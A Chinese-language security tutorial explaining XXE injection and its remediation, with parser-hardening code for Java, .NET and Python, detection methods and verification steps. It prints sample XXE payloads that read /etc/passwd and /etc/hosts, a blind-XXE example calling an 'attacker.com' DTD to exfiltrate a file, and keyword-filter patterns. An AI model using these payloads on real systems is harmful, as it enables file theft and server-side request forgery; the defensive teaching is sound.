XML外部实体注入与修复方案

XML外部实体注入(XXE)是一种严重的安全漏洞,攻击者利用XML解析器处理外部实体的功能来读取服务器内部文件、执行远程请求(SSRF)、扫描内网端口或发起拒绝服务攻击。以下是详细解释和修复方案:


XXE 攻击原理

  1. 外部实体声明

    XML允许定义实体(变量),实体可引用外部资源:

    xml

    复制代码
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
  2. 实体注入

    攻击者将恶意实体注入XML输入:

    xml

    复制代码
    <data>&xxe;</data>

    解析器会将 &xxe; 替换为 /etc/passwd 文件内容。

  3. 攻击类型

    • 读取本地文件(file://)

    • 发起HTTP请求(http://)→ SSRF

    • 拒绝服务(Billion Laughs 攻击)

    • 端口扫描(结合SSRF)


修复方案

1. 禁用外部实体处理(根本方案)

Java (SAX/DOM)

java

复制代码
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

.NET (XmlReader)

csharp

复制代码
var settings = new XmlReaderSettings {
  DtdProcessing = DtdProcessing.Prohibit,
  XmlResolver = null  // 禁用解析器
};

Python (lxml)

python

复制代码
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
2. 使用安全的XML库
  • 优先选择默认禁用外部实体的库:

    • Java: OWASP Java Encoder、jackson-dataformat-xml

    • Python: defusedxml(替代标准库)

      python

      复制代码
      from defusedxml.ElementTree import parse
      parse(xml_file)
3. 输入验证与过滤
  • 过滤用户输入的 <!DOCTYPE> 和 <!ENTITY> 声明

  • 使用正则表达式拦截敏感关键字(临时缓解):

    regex

    复制代码
    <!ENTITY.*?SYSTEM|file:|http:
4. 输出编码

避免直接输出XML解析结果,使用HTML编码:

java

复制代码
String safeOutput = Encode.forHtmlContent(rawXMLOutput);
5. 服务器层防御
  • WAF规则 :拦截包含 ENTITY、SYSTEM 等关键词的请求

  • 文件权限:限制应用账户对系统文件的访问权限


XXE 检测方法

  1. 手动测试

    提交测试Payload:

    xml

    复制代码
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]>
    <data>&xxe;</data>
  2. 自动化工具

    • OWASP ZAP、Burp Suite Professional(主动扫描)

    • XXEinjector(自动化利用工具)


额外注意事项

  • 依赖库风险:即使代码安全,底层库(如Log4j 1.x)可能引入XXE

  • 非文件协议攻击 :防范 php://filter、gopher:// 等协议

  • 盲XXE:通过DNS查询或HTTP请求外带数据(需配置外部DTD)

    xml

    复制代码
    <!ENTITY % payload SYSTEM "file:///secret">
    <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
    %dtd;

修复后验证

  1. 使用单元测试覆盖XXE攻击场景

  2. 定期进行安全扫描(SAST/DAST)

  3. 渗透测试:尝试读取 /etc/passwd 或触发DNS查询

关键原则:始终禁用DTD和外部实体解析。大多数现代XML解析器提供了明确的开关选项,启用安全配置是防御XXE的核心。

相关推荐
for_ever_love__29 分钟前
MySQL 全文索引实战:FULLTEXT、ngram 中文分词与 MATCH AGAINST 到底该怎么用
java·python·mysql·全文检索·分词·索引·ngram
java资料站33 分钟前
五、Spring AI Alibaba · Memory · Saver(短期会话)
java·spring·microsoft
袁哥大话安全1 小时前
巡隐WEBSHELL扫描软件
人工智能·安全·web
小宋10211 小时前
A2UI从零实战:Agent安全生成交互界面与事件回传
javascript·人工智能·安全·交互
草根大哥1 小时前
04-推拉流安全:签名、Token 与防盗链
安全·成本·延迟·自建cdn·ppcdn
夜之眷属2 小时前
Core dump 崩溃排查:JVM 宕机后,那份 core 文件怎么用 gdb 还原现场
java·运维·服务器·jvm
大包子2 小时前
structuredClone vs lodash.cloneDeep:核心差异与选型指南
javascript·vue.js
波加曼大王2 小时前
# vLLM不要迷信PagedAttention神话,聊聊线上藏着的内部碎片陷阱
java·架构
SL_staff2 小时前
目标健康度自检清单:开发者视角下的目标-计划-任务链路断点诊断
java·开源·github
for_ever_love__2 小时前
MySQL 高频面试题 30 问:索引、事务、锁、日志、主从与分库分表(MySQL 8.0 版)
java·数据库·spring boot·mysql·spring cloud·面试·总结